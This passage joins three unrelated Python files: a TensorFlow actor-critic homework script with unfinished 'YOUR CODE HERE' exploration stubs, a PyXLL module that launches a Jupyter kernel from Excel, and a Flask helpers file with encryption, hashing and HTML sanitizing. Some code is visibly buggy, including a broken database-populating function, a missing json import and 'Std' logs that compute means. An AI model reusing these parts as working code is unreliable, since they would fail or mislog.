self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # may need if using GPU
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in actor critic
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'discrete_logits', n_layers=self.n_layers, size=self.size)
return sy_logits_na
else:
sy_mean = build_mlp(sy_ob_no, self.ac_dim, 'continuous_logits', n_layers=self.n_layers, size=self.size)
sy_logstd = tf.Variable(tf.zeros(self.ac_dim), name='sy_logstd')
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, num_samples=1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean), 0, 1)
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_logprob_n = tf.distributions.Categorical(logits=sy_logits_na).log_prob(sy_ac_na)
else:
sy_mean, sy_logstd = policy_parameters
sy_logprob_n = tfp.distributions.MultivariateNormalDiag(
loc=sy_mean, scale_diag=tf.exp(sy_logstd)).log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)
# define the critic
self.critic_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_critic",
n_layers=self.n_layers,
size=self.size))
self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards, next_obs, terminals = [], [], [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no : ob[None]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
next_obs.append(ob)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
terminals.append(1)
break
else:
terminals.append(0)
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32),
"next_observation": np.array(next_obs, dtype=np.float32),
"terminal": np.array(terminals, dtype=np.float32)}
return path
def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Estimates the advantage function value for each timestep.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
next_values_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
q_n = re_n + self.gamma * next_values_n * (1-terminal_n)
curr_values_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: ob_no})
adv_n = q_n - curr_values_n
if self.normalize_advantages:
adv_n = (adv_n - np.mean(adv_n)) / (np.std(adv_n) + 1e-8)
return adv_n
def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
"""
Update the parameters of the critic.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
the reward for each timestep
terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
at that timestep of 0 if the episode did not end
returns:
nothing
"""
for i in range(self.num_grad_steps_per_target_update * self.num_target_updates):
if i % self.num_grad_steps_per_target_update == 0:
next_values_n = self.sess.run(self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
target_n = re_n + self.gamma * next_values_n * (1 - terminal_n)
_, loss = self.sess.run([self.critic_update_op, self.critic_loss],
feed_dict={self.sy_ob_no: ob_no, self.sy_target_n: target_n})
def update_actor(self, ob_no, ac_na, adv_n):
"""
Update the parameters of the policy.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
self.sess.run(self.actor_update_op,
feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
num_target_updates,
num_grad_steps_per_target_update,
animate,
logdir,
normalize_advantages,
seed,
n_layers,
size,
########################################################################
# Exploration args
bonus_coeff,
kl_weight,
density_lr,
density_train_iters,
density_batch_size,
density_hiddim,
dm,
replay_size,
sigma,
########################################################################
):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
########################################################################
# Exploration
if env_name == 'PointMass-v0':
from pointmass import PointMass
env = PointMass()
else:
env = gym.make(env_name)
dirname = logz.G.output_dir
########################################################################
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
'num_target_updates': num_target_updates,
'num_grad_steps_per_target_update': num_grad_steps_per_target_update,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_advantage_args = {
'gamma': gamma,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_advantage_args) #estimate_return_args
# build computation graph
agent.build_computation_graph()
########################################################################
# Initalize exploration density model
if dm != 'none':
if env_name == 'PointMass-v0' and dm == 'hist':
density_model = Histogram(
nbins=env.grid_size,
preprocessor=env.preprocess)
exploration = DiscreteExploration(
density_model=density_model,
bonus_coeff=bonus_coeff)
elif dm == 'rbf':
density_model = RBF(sigma=sigma)
exploration = RBFExploration(
density_model=density_model,
bonus_coeff=bonus_coeff,
replay_size=int(replay_size))
elif dm == 'ex2':
density_model = Exemplar(
ob_dim=ob_dim,
hid_dim=density_hiddim,
learning_rate=density_lr,
kl_weight=kl_weight)
exploration = ExemplarExploration(
density_model=density_model,
bonus_coeff=bonus_coeff,
train_iters=density_train_iters,
bsize=density_batch_size,
replay_size=int(replay_size))
exploration.density_model.build_computation_graph()
else:
raise NotImplementedError
########################################################################
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
########################################################################
if dm != 'none':
exploration.receive_tf_sess(agent.sess)
########################################################################
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = np.concatenate([path["reward"] for path in paths])
next_ob_no = np.concatenate([path["next_observation"] for path in paths])
terminal_n = np.concatenate([path["terminal"] for path in paths])
########################################################################
# Modify the reward to include exploration bonus
"""
1. Fit density model
if dm == 'ex2':
the call to exploration.fit_density_model should return ll, kl, elbo
else:
the call to exploration.fit_density_model should return nothing
2. Modify the re_n with the reward bonus by calling exploration.modify_reward
"""
old_re_n = re_n
if dm == 'none':
pass
else:
# 1. Fit density model
if dm == 'ex2':
### PROBLEM 3
### YOUR CODE HERE
raise NotImplementedError
elif dm == 'hist' or dm == 'rbf':
### PROBLEM 1
### YOUR CODE HERE
raise NotImplementedError
else:
assert False
# 2. Modify the reward
### PROBLEM 1
### YOUR CODE HERE
raise NotImplementedError
print('average state', np.mean(ob_no, axis=0))
print('average action', np.mean(ac_na, axis=0))
# Logging stuff.
# Only works for point mass.
if env_name == 'PointMass-v0':
np.save(os.path.join(dirname, '{}'.format(itr)), ob_no)
########################################################################
agent.update_critic(ob_no, next_ob_no, re_n, terminal_n)
adv_n = agent.estimate_advantage(ob_no, next_ob_no, re_n, terminal_n)
agent.update_actor(ob_no, ac_na, adv_n)
if n_iter - itr < 10:
max_reward_path_idx = np.argmax(np.array([path["reward"].sum() for path in paths]))
print(paths[max_reward_path_idx]['reward'])
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
########################################################################
logz.log_tabular("Unmodified Rewards Mean", np.mean(old_re_n))
logz.log_tabular("Unmodified Rewards Std", np.mean(old_re_n))
logz.log_tabular("Modified Rewards Mean", np.mean(re_n))
logz.log_tabular("Modified Rewards Std", np.mean(re_n))
if dm == 'ex2':
logz.log_tabular("Log Likelihood Mean", np.mean(ll))
logz.log_tabular("Log Likelihood Std", np.std(ll))
logz.log_tabular("KL Divergence Mean", np.mean(kl))
logz.log_tabular("KL Divergence Std", np.std(kl))
logz.log_tabular("Negative ELBo", -elbo)
########################################################################
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vac')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--num_target_updates', '-ntu', type=int, default=10)
parser.add_argument('--num_grad_steps_per_target_update', '-ngsptu', type=int, default=10)
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=32)
########################################################################
parser.add_argument('--bonus_coeff', '-bc', type=float, default=1e-3)
parser.add_argument('--density_model', type=str, default='hist | rbf | ex2 | none')
parser.add_argument('--kl_weight', '-kl', type=float, default=1e-2)
parser.add_argument('--density_lr', '-dlr', type=float, default=5e-3)
parser.add_argument('--density_train_iters', '-dti', type=int, default=1000)
parser.add_argument('--density_batch_size', '-db', type=int, default=64)
parser.add_argument('--density_hiddim', '-dh', type=int, default=32)
parser.add_argument('--replay_size', '-rs', type=int, default=int(1e6))
parser.add_argument('--sigma', '-sig', type=float, default=0.2)
########################################################################
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
logdir = 'ac_' + args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_AC(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
num_target_updates=args.num_target_updates,
num_grad_steps_per_target_update=args.num_grad_steps_per_target_update,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
seed=seed,
n_layers=args.n_layers,
size=args.size,
########################################################################
bonus_coeff=args.bonus_coeff,
kl_weight=args.kl_weight,
density_lr=args.density_lr,
density_train_iters=args.density_train_iters,
density_batch_size=args.density_batch_size,
density_hiddim=args.density_hiddim,
dm=args.density_model,
replay_size=args.replay_size,
sigma=args.sigma
########################################################################
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_AC in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
kernel.py
|
"""
Start an IPython Qt console or notebook connected to the python session
running in Excel.
This requires sys.executable to be set, and so it's recommended
that the following is added to the pyxll.cfg file:
[PYTHON]
executable = <path to your python installation>/pythonw.exe
"""
from .magic import ExcelMagics
from ipykernel.kernelapp import IPKernelApp
from ipykernel.embed import embed_kernel
from zmq.eventloop import ioloop
from pyxll import schedule_call
import subprocess
import logging
import threading
import queue
import atexit
import sys
import os
import re
_log = logging.getLogger(__name__)
_all_jupyter_processes = []
try:
import win32api
except ImportError:
win32api = None
if getattr(sys, "_ipython_kernel_running", None) is None:
sys._ipython_kernel_running = False
if getattr(sys, "_ipython_app", None) is None:
sys._ipython_app = False
def _which(program):
"""find an exe's full path by looking at the PATH environment variable"""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
class PushStdout:
"""Context manage to temporarily replace stdout/stderr."""
def __init__(self, stdout, stderr):
self.__stdout = stdout
self.__stderr = stderr
def __enter__(self):
self.__orig_stdout = sys.stdout
self.__orig_stderr = sys.stderr
sys.stdout = self.__stdout
sys.stderr = self.__stderr
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stdout = self.__orig_stdout
sys.stderr = self.__orig_stderr
def start_kernel():
"""starts the ipython kernel and returns the ipython app"""
if sys._ipython_app and sys._ipython_kernel_running:
return sys._ipython_app
# The stdout/stderrs used by IPython. These get set after the kernel has started.
ipy_stdout = sys.stdout
ipy_stderr = sys.stderr
# patch IPKernelApp.start so that it doesn't block
def _IPKernelApp_start(self):
nonlocal ipy_stdout, ipy_stderr
if self.poller is not None:
self.poller.start()
self.kernel.start()
# set up a timer to periodically poll the zmq ioloop
self.loop = ioloop.IOLoop.current()
def poll_ioloop():
try:
# Use the IPython stdout/stderr while running the kernel
with PushStdout(ipy_stdout, ipy_stderr):
# If the kernel has been closed then run the event loop until it gets to the
# stop event added by IPKernelApp.shutdown_request
if self.kernel.shell.exit_now:
_log.debug("IPython kernel stopping (%s)" % self.connection_file)
self.loop.start()
sys._ipython_kernel_running = False
return
# otherwise call the event loop but stop immediately if there are no pending events
self.loop.add_timeout(0, lambda: self.loop.add_callback(self.loop.stop))
self.loop.start()
except:
_log.error("Error polling Jupyter loop", exc_info=True)
schedule_call(poll_ioloop, delay=0.1)
sys._ipython_kernel_running = True
schedule_call(poll_ioloop, delay=0.1)
IPKernelApp.start = _IPKernelApp_start
# IPython expects sys.__stdout__ to be set, and keep the original values to
# be used after IPython has set its own.
sys.__stdout__ = sys_stdout = sys.stdout
sys.__stderr__ = sys_stderr = sys.stderr
# call the API embed function, which will use the monkey-patched method above
embed_kernel(local_ns={})
ipy = IPKernelApp.instance()
# register the magic functions
ipy.shell.register_magics(ExcelMagics)
# Keep a reference to the kernel even if this module is reloaded
sys._ipython_app = ipy
# Restore sys stdout/stderr and keep track of the IPython versions
ipy_stdout = sys.stdout
ipy_stderr = sys.stderr
sys.stdout = sys_stdout
sys.stderr = sys_stderr
# patch user_global_ns so that it always references the user_ns dict
setattr(ipy.shell.__class__, 'user_global_ns', property(lambda self: self.user_ns))
# patch ipapp so anything else trying to get a terminal app (e.g. ipdb) gets our IPKernalApp.
from IPython.terminal.ipapp import TerminalIPythonApp
TerminalIPythonApp.instance = lambda: ipy
# Use the inline matplotlib backend
mpl = ipy.shell.find_magic("matplotlib")
if mpl:
try:
mpl("inline")
except ImportError:
pass
return ipy
def launch_jupyter(connection_file, cwd=None, timeout=30):
"""Launch a Jupyter notebook server as a child process.
:param connection_file: File for kernels to use to connect to an existing kernel.
:param cwd: Current working directory to start the notebook in.
:param timeout: Timeout in seconds to wait for the Jupyter process to start.
:return: (Popen2 instance, URL string)
"""
# Find jupyter-notebook.exe in the Scripts path local to python.exe
jupyter_notebook = None
if sys.executable and os.path.basename(sys.executable) in ("python.exe", "pythonw.exe"):
for path in (os.path.dirname(sys.executable), os.path.join(os.path.dirname(sys.executable), "Scripts")):
jupyter_notebook = os.path.join(path, "jupyter-notebook.exe")
if os.path.exists(jupyter_notebook):
break
# If it wasn't found look for it on the system path
if jupyter_notebook is None or not os.path.exists(jupyter_notebook):
jupyter_notebook = _which("jupyter-notebook.exe")
if jupyter_notebook is None or not os.path.exists(jupyter_notebook):
raise Exception("jupyter-notebook.exe not found")
# Use the current python path when launching
env = dict(os.environ)
env["PYTHONPATH"] = ";".join(sys.path)
# Set PYXLL_IPYTHON_CONNECTION_FILE so the manager knows what to connect to
env["PYXLL_IPYTHON_CONNECTION_FILE"] = connection_file
# run jupyter in it's own process
cmd = [
jupyter_notebook,
"--NotebookApp.kernel_manager_class=pyxll_jupyter.extipy.ExternalIPythonKernelManager",
"--no-browser",
"-y"
]
proc = subprocess.Popen(cmd, cwd=cwd, env=env, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
if proc.poll() is not None:
raise Exception("Command '%s' failed to start" % " ".join(cmd))
# Add it to the list of processes to be killed when Excel exits
_all_jupyter_processes.append(proc)
# Monitor the output of the process in a background thread
def thread_func(proc, url_queue, killed_event):
encoding = sys.getfilesystemencoding()
matched_url = None
while proc.poll() is None:
line = proc.stdout.readline().decode(encoding, "replace").strip()
if line.startswith("DEBUG"):
_log.debug(line)
continue
_log.info(line)
if matched_url is None:
match = re.search(r"(https?://([a-z|0-9]+\.?)+(:[0-9]+)?/?\?token=[a-f|0-9]+)", line, re.I | re.A)
if match:
matched_url = match.group(1)
_log.info("Found Jupyter notebook server running on '%s'" % matched_url)
url_queue.put(matched_url)
if matched_url is None and not killed_event.is_set():
_log.error("Jupyter notebook process ended without printing a URL.")
url_queue.put(None)
url_queue = queue.Queue()
killed_event = threading.Event()
thread = threading.Thread(target=thread_func, args=(proc, url_queue, killed_event))
thread.daemon = True
thread.start()
# Wait for the URL to be logged
try:
url = url_queue.get(timeout=timeout)
except queue.Empty:
_log.error("Timed-out waiting for the Jupyter notebook URL.")
url = None
if url is None:
if proc.poll() is None:
_log.debug("Killing Jupyter notebook process...")
killed_event.set()
_kill_process(proc)
_all_jupyter_processes.remove(proc)
if thread.is_alive():
_log.debug("Waiting for background thread to complete...")
thread.join(timeout=1)
if thread.is_alive():
_log.warning("Timed out waiting for background thread.")
raise RuntimeError("Timed-out waiting for the Jupyter notebook URL.")
# Return the proc and url
return proc, url
def _kill_process(proc):
"""Kill a process using 'taskkill /F /T'."""
if proc.poll() is not None:
return
si = subprocess.STARTUPINFO(wShowWindow=subprocess.SW_HIDE)
retcode = subprocess.call(['taskkill', '/F', '/T', '/PID', str(proc.pid)],
startupinfo=si,
shell=True)
if proc.poll() is None:
_log.warning("Failed to kill Jupyter process %d: %s" % (proc.pid, retcode))
@atexit.register
def _kill_jupyter_processes():
"""Ensure all Jupyter processes are killed."""
global _all_jupyter_processes
for proc in _all_jupyter_processes:
_kill_process(proc)
_all_jupyter_processes = [x for x in _all_jupyter_processes if x.poll() is None]
|
helpers.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# ------- IMPORT DEPENDENCIES -------
from datetime import *
from dateutil import *
from dateutil import tz
import time
from jinja2 import Environment
import bleach
import jinja2
# security
import os
import binascii
from cryptography.fernet import Fernet
from werkzeug.security import generate_password_hash, check_password_hash
import base64
# ------- IMPORT LOCAL DEPENDENCIES -------
from threading import Thread
from functools import wraps
from flask import request, redirect, current_app
from . import app
# ------- TEST IF REQUEST ASK JSON -------
def request_wants_json():
if request.headers['Accept']:
if 'application/json' in request.headers['Accept']:
return True
return False
# ------- TO JSON -------
def to_json(func):
def wrapper(*args, **kwargs):
get_fun = func(*args, **kwargs)
return json.dumps(get_fun)
return wrapper
# ------- DECORATORS -------
def threaded_async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
def ssl_required(fn):
@wraps(fn)
def decorated_controller(*args, **kwargs):
if current_app.config.get("SSL"):
if request.is_secure:
return fn(*args, **kwargs)
else:
return redirect(request.url.replace("http://", "https://"))
return fn(*args, **kwargs)
return decorated_controller
# ------- SECURITY TOOL : ENCODE, ENCRYPT, HASH, KEY GENERATOR -------
class SecurityTool(object):
"""
Security tool : secret key generator and encode, encrypt, hash tools
"""
__cipher_suite = Fernet(app.config['FERNET_SECRET_KEY'])
# def __init__(self):
# Fernet : symmetric encryption
# FERNET SECRET KEY for encryption : This must be kept secret. Keep this some place safe!
# If you lose it you’ll no longer be able to decrypt messages and anyone with this key is able to create and read messages.
# __cipher_suite = Fernet(app.config['FERNET_SECRET_KEY'])
# override to prevent peeking
# self.__dict__ = {}
# ------- ENCRYPTION WITH A KEY -------
def encrypt(self, plain_text):
# Fernet token : A secure message that cannot be read or altered without the key.
# It is URL-safe base64-encoded.
return self.__cipher_suite.encrypt(plain_text)
def decrypt(self, fernet_token):
return self.__cipher_suite.decrypt(fernet_token)
# ------- HASH STRING AND CHECK HASHED -------
def hash(self, password):
return generate_password_hash(password)
def check_hashed(self, hashed, input_password):
return check_password_hash(hashed, input_password)
# ------- BASE64 ENCODING AND DECODING -------
def encode(self, data):
return base64.b64encode(data)
def decode(self, encoded):
return base64.b64decode(encoded)
# ------- RANDOM TOKEN KEY GENERATOR -------
def generate_token_key(self):
# a secret key should be as random as possible.
token = binascii.hexlify(os.urandom(24))
return token
# ------- RANDOM POPULATE DATABASE -------
def populate_db_with_random_data(db_model):
# ---- example here with a db model ----
# ---- it might take some time ----
from random import choice
from string import printable
import humanize
import os
start = time()
lis = list(printable)
for i in range(0, 50000):
for k,v in db_model():
short_value_list = ['title', 'name', 'password']
long_value_list = ['description']
if short_value_list in k :
k = ''.join(choice(lis) for _ in xrange(5))
if long_value_list in k :
k = ''.join(choice(lis) for _ in xrange(200))
db_model().add_data(k)
return "done in %.3f | database size: %s" % (time() - start, humanize.naturalsize(os.path.getsize("data/db.sqlite")))
# ------- HTML SANITIZER UTILS -------
ALLOWED_TAGS = bleach.sanitizer.ALLOWED_TAGS + [
'div', 'span', 'p', 'br', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'pre', 'code',
'dl', 'dt', 'dd', 'small', 'sup',
'img',
'input',
'table', 'tbody', 'thead', 'tr', 'th', 'td',
'section', 'header', 'footer', 'nav', 'article', 'aside', 'figure',
'dialog', 'hgroup', 'mark', 'time', 'meter', 'command', 'output',
'progress', 'audio', 'video', 'details', 'datagrid', 'datalist', 'table',
'address'
]
ALLOWED_ATTRIBUTES = bleach.sanitizer.ALLOWED_ATTRIBUTES
ALLOWED_ATTRIBUTES['div'] = ['class', 'id']
ALLOWED_ATTRIBUTES['span'] = ['style', ]
ALLOWED_ATTRIBUTES['img'] = ['src', 'id', 'align', 'alt', 'class', 'is', 'title', 'style', 'width', 'height']
ALLOWED_ATTRIBUTES['a'] = ['id', 'class', 'href', 'title', ]
ALLOWED_ATTRIBUTES.update(dict((x, ['style', ]) for x in ('h1', 'h2', 'h3', 'h4', 'h5', 'h6')))
ALLOWED_ATTRIBUTES.update(dict((x, ['id', ]) for x in (
'p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'pre', 'code', 'dl', 'dt', 'dd',
'section', 'header', 'footer', 'nav', 'article', 'aside', 'figure',
'dialog', 'hgroup', 'mark', 'time', 'meter', 'command', 'output',
'progress', 'audio', 'video', 'details', 'datagrid', 'datalist', 'table',
'address'
)))
ALLOWED_STYLES = bleach.sanitizer.ALLOWED_STYLES + ['color', 'background-color']
def sanitize_html(text):
return bleach.clean(text, attributes=ALLOWED_ATTRIBUTES, tags=ALLOWED_TAGS, styles=ALLOWED_STYLES, strip_comments=False)
def parse_html(text):
return jinja2.Markup(text)
app.jinja_env.filters['parse_html'] = parse_html
app.jinja_env.filters['sanitize_html'] = sanitize_html
# ------- DATETIME UTILS -------
def datetime_string_to_datetime_obj(datetime_string, strftime):
# Convert datetime string to datetime obj with his format described in strftime argument function
datetime_obj = datetime.strptime(datetime_string, strftime )
# print type(datetime_obj)
return datetime_obj
def datetime_obj_to_datetime_string(datetime_obj, strftime = '%Y-%m-%d %H:%M:%S %H:%M:%S'):
